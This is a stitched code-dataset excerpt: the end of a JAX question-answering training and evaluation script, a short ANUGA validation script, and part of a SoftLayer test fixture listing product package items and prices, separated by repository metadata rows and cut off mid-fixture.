                    batch = eval_dataset[-num_leftover_samples:]
                    batch = {k: np.array(v) for k, v in batch.items()}
                    _ = batch.pop("example_id")
                    _ = batch.pop("offset_mapping")
                    # Un-pmapped eval_step on the unreplicated state for the partial batch.
                    predictions = eval_step(unreplicate(state), batch)
                    start_logits = np.array([pred for pred in predictions[0]])
                    end_logits = np.array([pred for pred in predictions[1]])
                    all_start_logits.append(start_logits)
                    all_end_logits.append(end_logits)
                max_len = max([x.shape[1] for x in all_start_logits])  # Get the max_length of the tensor
                # concatenate the numpy array
                start_logits_concat = create_and_fill_np_array(all_start_logits, eval_dataset, max_len)
                end_logits_concat = create_and_fill_np_array(all_end_logits, eval_dataset, max_len)
                # delete the list of numpy arrays
                del all_start_logits
                del all_end_logits
                outputs_numpy = (start_logits_concat, end_logits_concat)
                prediction = post_processing_function(eval_examples, eval_dataset, outputs_numpy)
                eval_metrics = compute_metrics(prediction)
                logger.info(f"Step... ({cur_step}/{total_steps} | Evaluation metrics: {eval_metrics})")
                if has_tensorboard and jax.process_index() == 0:
                    write_eval_metric(summary_writer, eval_metrics, cur_step)
            if (cur_step % training_args.save_steps == 0 and cur_step > 0) or (cur_step == total_steps):
                # save checkpoint after each epoch and push checkpoint to the hub
                if jax.process_index() == 0:
                    params = jax.device_get(unreplicate(state.params))
                    model.save_pretrained(training_args.output_dir, params=params)
                    tokenizer.save_pretrained(training_args.output_dir)
                    if training_args.push_to_hub:
                        repo.push_to_hub(commit_message=f"Saving weights and logs of step {cur_step}", blocking=False)
        epochs.desc = f"Epoch ... {epoch + 1}/{num_epochs}"
    # endregion
    # Eval after training
    if training_args.do_eval:
        eval_metrics = {}
        all_start_logits = []
        all_end_logits = []
        eva_loader = eval_data_collator(eval_dataset, eval_batch_size)
        for batch in tqdm(eva_loader, total=len(eval_dataset) // eval_batch_size, desc="Evaluating ...", position=2):
            # example_id/offset_mapping are post-processing metadata, not model inputs.
            _ = batch.pop("example_id")
            _ = batch.pop("offset_mapping")
            predictions = p_eval_step(state, batch)
            start_logits = np.array([pred for pred in chain(*predictions[0])])
            end_logits = np.array([pred for pred in chain(*predictions[1])])
            all_start_logits.append(start_logits)
            all_end_logits.append(end_logits)
        # evaluate also on leftover examples (not divisible by batch_size)
        num_leftover_samples = len(eval_dataset) % eval_batch_size
        # make sure leftover batch is evaluated on one device
        if num_leftover_samples > 0 and jax.process_index() == 0:
            # take leftover samples
            batch = eval_dataset[-num_leftover_samples:]
            batch = {k: np.array(v) for k, v in batch.items()}
            _ = batch.pop("example_id")
            _ = batch.pop("offset_mapping")
            # Un-pmapped eval_step on the unreplicated state for the partial batch.
            predictions = eval_step(unreplicate(state), batch)
            start_logits = np.array([pred for pred in predictions[0]])
            end_logits = np.array([pred for pred in predictions[1]])
            all_start_logits.append(start_logits)
            all_end_logits.append(end_logits)
        max_len = max([x.shape[1] for x in all_start_logits])  # Get the max_length of the tensor
        # concatenate the numpy array
        start_logits_concat = create_and_fill_np_array(all_start_logits, eval_dataset, max_len)
        end_logits_concat = create_and_fill_np_array(all_end_logits, eval_dataset, max_len)
        # delete the list of numpy arrays
        del all_start_logits
        del all_end_logits
        outputs_numpy = (start_logits_concat, end_logits_concat)
        prediction = post_processing_function(eval_examples, eval_dataset, outputs_numpy)
        eval_metrics = compute_metrics(prediction)
        # Only process 0 writes the final metrics file.
        if jax.process_index() == 0:
            eval_metrics = {f"eval_{metric_name}": value for metric_name, value in eval_metrics.items()}
            path = os.path.join(training_args.output_dir, "eval_results.json")
            with open(path, "w") as f:
                json.dump(eval_metrics, f, indent=4, sort_keys=True)
# Standard script entry point.
if __name__ == "__main__":
    main()
| 45.132634 | 151 | 0.661029 |
02eb8dbd01a211cdc4a7ca0c1b0e62fcd129657f | 231 | py | Python | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 136 | 2015-05-07T05:47:43.000Z | 2022-02-16T03:07:40.000Z | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 184 | 2015-05-03T09:27:54.000Z | 2021-12-20T04:22:48.000Z | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 70 | 2015-03-18T07:35:22.000Z | 2021-11-01T07:07:29.000Z | #--------------------------------
# import modules
#--------------------------------
import anuga
from anuga.validation_utilities import produce_report
args = anuga.get_args()
produce_report('numerical_MacDonald.py', args=args)
| 21 | 53 | 0.575758 |
c4c45985d6a4e4aa9d0f0cb13d69fde0187b424d | 71,767 | py | Python | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | # pylint: skip-file
HARDWARE_ITEMS = [
{'attributes': [],
'capacity': '999',
'description': 'Unknown',
'itemCategory': {'categoryCode': 'unknown', 'id': 325},
'keyName': 'UNKNOWN',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1245172,
"locationGroupId": '',
'itemId': 935954,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '64',
'description': '1 IPv6 Address',
'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
'id': 325},
'keyName': '1_IPV6_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
"locationGroupId": '',
'itemId': 4097,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}},
{'attributes': [],
'capacity': '1',
'description': '1 IP Address',
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
'keyName': '1_IP_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 21,
"locationGroupId": '',
'itemId': 15,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
'id': 1014}],
'description': 'Unlimited SSL VPN Users',
'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 420,
"locationGroupId": '',
'itemId': 309,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'description': 'Reboot / KVM over IP',
'itemCategory': {'categoryCode': 'remote_management',
'id': 46},
'keyName': 'REBOOT_KVM_OVER_IP',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 906,
"locationGroupId": '',
'itemId': 504,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'id': 22505,
"locationGroupId": '',
'itemId': 4481,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 98}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]}]
ENTERPRISE_PACKAGE = {
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 240,
'name': 'Endurance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_service_enterprise'},
'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
'prices': [
{
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 45058,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_file'},
'keyName': 'FILE_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 45108,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_block'},
'keyName': 'BLOCK_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 45098,
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '10_GB_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46160,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46170,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 45860,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46659,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45128,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46789,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45318,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '300'}
],
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'WRITEHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45088,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '200'}
],
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'READHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45078,
'locationGroupId': ''
}
]
}
]
}
PERFORMANCE_PACKAGE = {
'categories': [
{'categoryCode': 'performance_storage_iscsi'},
{'categoryCode': 'performance_storage_nfs'}
],
'id': 222,
'name': 'Performance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_iscsi'}
],
'id': 40672,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_nfs'},
'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_nfs'}
],
'id': 40662,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40682,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40742,
'locationGroupId': ''
}
]
}, {
'capacity': '800',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '800_IOPS_4',
'prices': [
{
'capacityRestrictionMaximum': '1000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 41562,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '1000_IOPS',
'prices': [
{
'capacityRestrictionMaximum': '20',
'capacityRestrictionMinimum': '20',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 40882,
'locationGroupId': ''
}
]
}
]
}
SAAS_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 189443,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '999',
'capacityMinimum': '500',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '500_999_GBS',
'prices': [
{
'id': 189993,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
'prices': [
{
'id': 193433,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
'prices': [
{
'id': 194763,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '10000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '999',
'capacityRestrictionMinimum': '500',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190053,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': ''
}
]
}, {
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 193373,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 194703,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 191193,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193613,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 194943,
'locationGroupId': ''}]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '1',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 192033,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 194693,
'locationGroupId': ''
}
]
}
]
}
SAAS_REST_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': None
}
]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': None
}
]
}
]
}
activePreset1 = {
'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
'id': 64,
'isActive': '1',
'keyName': 'S1270_8GB_2X1TBSATA_NORAID',
'name': 'S1270 8GB 2X1TBSATA NORAID',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
activePreset2 = {
'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
'id': 65,
'isActive': '1',
'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
getAllObjects = [{
'activePresets': [activePreset1],
'accountRestrictedActivePresets': [activePreset2],
'description': 'Bare Metal Server',
'firstOrderStepId': 1,
'id': 200,
'isActive': 1,
'items': HARDWARE_ITEMS,
'name': 'Bare Metal Server',
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'subDescription': 'Bare Metal Server',
'unitSize': 1,
"itemPrices": [
{
"hourlyRecurringFee": ".027",
"id": 205911,
"laborFee": "0",
"locationGroupId": 505,
"capacityRestrictionMaximum": "40",
"capacityRestrictionMinimum": "40",
"capacityRestrictionType": "CORE",
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
},
{
"hourlyRecurringFee": "0",
"id": 199467,
"laborFee": "0",
"locationGroupId": '',
"recurringFee": "0",
"item": {
"capacity": "0",
"description": "Load Balancer Bandwidth",
"id": 10051,
"keyName": "LOAD_BALANCER_BANDWIDTH",
}
},
{
"hourlyRecurringFee": ".028",
"id": 205913,
"laborFee": "0",
"locationGroupId": 507,
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
}]
}]
getItems = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
},
{
'id': 1240,
'keyName': 'KeyName014',
'capacity': '4',
'units': 'PRIVATE_CORE',
'description': 'Computing Instance (Dedicated)',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1007,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 1250,
'keyName': 'KeyName015',
'capacity': '4',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1144,
'locationGroupId': None,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 112233,
'keyName': 'KeyName016',
'capacity': '55',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 332211,
'locationGroupId': 1,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 4439,
'keyName': 'KeyName017',
'capacity': '1',
'description': '1 GB iSCSI Storage',
'itemCategory': {'categoryCode': 'iscsi'},
'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 1121,
'keyName': 'KeyName081',
'capacity': '20',
'description': '20 GB iSCSI snapshot',
'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
},
{
'id': 4440,
'keyName': 'KeyName019',
'capacity': '4',
'description': '4 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 8880,
'keyName': 'KeyName0199',
'capacity': '8',
'description': '8 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 44400,
'keyName': 'KeyName0155',
'capacity': '4',
'description': '4 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 88800,
'keyName': 'KeyName0144',
'capacity': '8',
'description': '8 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 10,
'keyName': 'KeyName0341',
'capacity': '0',
'description': 'Global IPv4',
'itemCategory': {'categoryCode': 'global_ipv4'},
'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 66464,
'keyName': '1_IPV6_ADDRESS',
'capacity': '64',
'description': '/64 Block Portable Public IPv6 Addresses',
'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
},
{
'id': 610,
'keyName': 'KeyName031',
'capacity': '0',
'description': 'Global IPv6',
'itemCategory': {'categoryCode': 'global_ipv6'},
'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0.10',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0.1',
